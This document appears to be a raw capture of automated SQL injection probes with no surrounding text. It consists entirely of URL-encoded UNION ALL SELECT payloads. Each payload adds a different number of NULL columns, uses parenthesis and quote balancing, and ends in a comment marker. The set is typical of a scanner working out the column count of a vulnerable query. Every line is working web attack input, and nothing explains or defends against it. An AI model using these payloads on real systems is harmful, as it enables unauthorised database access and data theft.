1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284844%3D4844 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%285622%3D5622 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289373%3D9373 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%281412%3D1412 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282284%3D2284 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288673%3D8673 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286418%3D6418 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286772%3D6772 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287854%3D7854 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288035%3D8035 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283420%3D3420 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%285706%3D5706 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283457%3D3457 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283141%3D3141 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286385%3D6385 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287131%3D7131 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282920%3D2920 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285226%3D5226 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281645%3D1645 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286789%3D6789 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286667%3D6667 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287224%3D7224 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%285275%3D5275 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27AOzu%27%3D%27AOzu 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27DtEn%27%3D%27DtEn 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27ZCdh%27%3D%27ZCdh 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27tnET%27%3D%27tnET 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27vsou%27%3D%27vsou 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27BRoK%27%3D%27BRoK 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27qmeX%27%3D%27qmeX 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27FjkE%27%3D%27FjkE 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27jGbH%27%3D%27jGbH 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Ggbf%27%3D%27Ggbf 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27GcKg%27%3D%27GcKg 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27Hjly%27%3D%27Hjly 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27rVSw%27%3D%27rVSw 